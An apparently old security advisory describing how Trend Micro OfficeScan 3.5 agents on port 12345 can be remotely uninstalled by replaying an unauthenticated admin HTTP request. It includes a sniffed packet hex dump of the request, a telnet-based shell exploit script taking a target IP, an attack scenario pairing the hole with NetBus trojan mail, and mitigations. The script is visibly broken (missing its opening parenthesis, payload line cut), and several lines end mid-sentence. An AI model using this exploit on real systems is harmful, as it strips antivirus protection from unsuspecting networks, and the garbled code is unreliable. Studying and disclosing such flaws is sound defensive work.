

    TendMicro OfficeScan 3.5


    Gregory Duchemin  found following.   He tried  something new  with
    the  anti-viral  agent  listening  on  the  port 12345.  First, he
    sniffed an  admin request  from the  web-based centralized  server
    toward the target.  This  request is in the http/1.0  protocol, so
    in a human readable  form.  This is  an example of such  a tracked
    request with the help of the very cool buttsniffer (BO plug-in):

        Source IP: x.x.x.x  Target IP: x.x.x.x
        TCP  Length: 533  Source Port: 1241  Target Port: 12345  Seq: 00815779
        Ack: 01263158
        Flags: PA  Window: 8760  TCP ChkSum: 7159  UrgPtr: 0
         00000000: 47 45 54 20 2F 3F 30 35 36 38 30 46 35 34 35 45   GET
         00000010: 38 38 41 45 44 35 33 39 32 42 38 38 35 45 45 37
         00000020: 31 34 32 44 38 42 42 46 38 45 33 35 32 36 39 33
         00000030: 37 32 35 34 33 30 44 43 31 45 37 46 39 35 34 46
         00000040: 42 33 34 35 46 45 38 39 39 46 30 31 32 30 33 42
         00000050: 32 32 32 43 46 41 46 38 42 30 35 43 41 35 44 39
         00000060: 30 43 46 35 44 45 45 37 33 38 31 30 32 41 42 31
         00000070: 43 41 45 45 45 36 32 46 37 46 34 41 41 33 36 45
         00000080: 43 44 32 30 43 42 35 45 41 44 45 43 32 43 35 34
         00000090: 37 37 36 36 35 30 44 35 35 35 41 39 34 31 35 42
         000000A0: 45 35 33 34 38 45 37 46 30 30 46 39 38 31 41 35
         000000B0: 44 42 45 45 31 46 33 41 42 33 30 46 41 42 43 34
         000000C0: 33 33 32 33 30 46 36 36 42 34 39 39 38 32 46 44
         000000D0: 41 35 46 30 37 37 44 30 37 41 46 37 32 31 43 44
         000000E0: 37 39 31 38 41 35 35 38 30 43 33 33 31 42 43 34
         000000F0: 43 32 41 39 35 39 42 46 36 33 34 31 31 32 42 34
         00000100: 46 39 41 39 33 39 35 33 42 38 46 36 34 42 30 32
         00000110: 43 38 38 31 45 44 36 43 35 35 42 46 43 44 36 32
         00000120: 30 35 36 31 33 34 42 42 46 38 30 30 37 45 46 46
         00000130: 42 36 36 34 33 35 31 38 31 41 37 37 36 32 45 45
         00000140: 30 32 42 38 39 31 33 46 35 34 35 44 32 35 31 31
         00000150: 38 39 37 43 38 39 38 46 33 45 35 33 42 42 38 44
         00000160: 34 46 34 45 43 37 31 45 37 46 41 43 36 44 38 45
         00000170: 32 36 44 33 45 35 35 41 39 41 37 43 31 45 42 39
         00000180: 36 42 44 46 44 32 42 45 38 34 34 46 43 35 45 43
         00000190: 36 35 44 41 46 36 43 37 31 43 30 32 39 34 32 41
         000001A0: 39 32 42 42 39 37 38 41 43 38 37 35 31 32 30 32
         000001B0: 43 35 30 45 45 34 30 34 34 35 44 44 36 43 44 31
         000001C0: 31 43 45 31 31 41 39 39 30 34 20 48 54 54 50 2F   1CE11A9904
         000001D0: 31 2E 30 0D 0A 48 6F 73 74 3A 20 31 30 2E 31 2E   1.0..Host:
         000001E0: 36 2E 39 34 3A 31 32 33 34 35 0D 0A 55 73 65 72
         000001F0: 2D 41 67 65 6E 74 3A 20 4F 66 66 69 63 65 53 63   -Agent:
         00000200: 61 6E 2F 33 2E 35 0D 0A 41 63 63 65 70 74 3A 20
         00000210: 2A 2F 2A 0D 0A                                    */*..

    Note the very big ascii  string behind the default html  document.
    This  string  means  in  this  case:  "remote  un-installation  of
    TrendMicro product"!  So  Gregory replaid the same  request toward
    another client with success.  Few seconds later, this  workstation
    didn't have no longer OfficeScan installed on it.  The product was
    removed from the hard disk on the target system.

    That attack was conducted against a windows NT 4.0 SP5  OfficeScan
    3.5,  since  the  problem  relies  in  a protocol layer not in the
    system involved,  others system  like windows  9.X et  windows 3.x
    should be infected too.

    So, a malicious user is able to remotly suppress every  OfficeScan
    inside the company network (stealing the admin priviledge) without
    any authentication just because, this authentication is only  used
    to launch the manager not to  sign or crypt the paquets.   Because
    the manager  is used  to do  other administration  task, it may be
    possible to upload a zero  length signature file, for example.   A
    dark scenario may be this one, in five steps:

        1- the malicious user inject  a bad signature file to  all the
        2- then he send his trojanned mail (with a netbus attached) to
           every users
        3- after  a  good  time  drinking  his cola, he starts  netbus
           client and look for all the possibly infected stations
        4- because  12345 is  the netbus  port too,  admins should not
           understand immediatly that they r under attack
        5- the attacker start his bad job

    Gregory wrote a little exploit too:

    # Usage: TMKill target_ip
    # ( Gregory Duchemin )
    sleep 2
    echo "GET
    E11A9904 HTTP/1.0"
    echo "Host:"$1":12345"
    echo "User-Agent: OfficeScan/3.5"
    echo "Accept:*/*"
    sleep 10
    )| telnet $1 12345 2>&1 | tee -a ./log.txt



        1- contact TrendMicro
        2- close the 12345 port of all the stations, stop the  service
           TMlisten  in  the  services  menu  (  NT ), no more network
           upgrade till TrendMicro will give us a patch
        3- install  sniffers all  over the  network to  track possible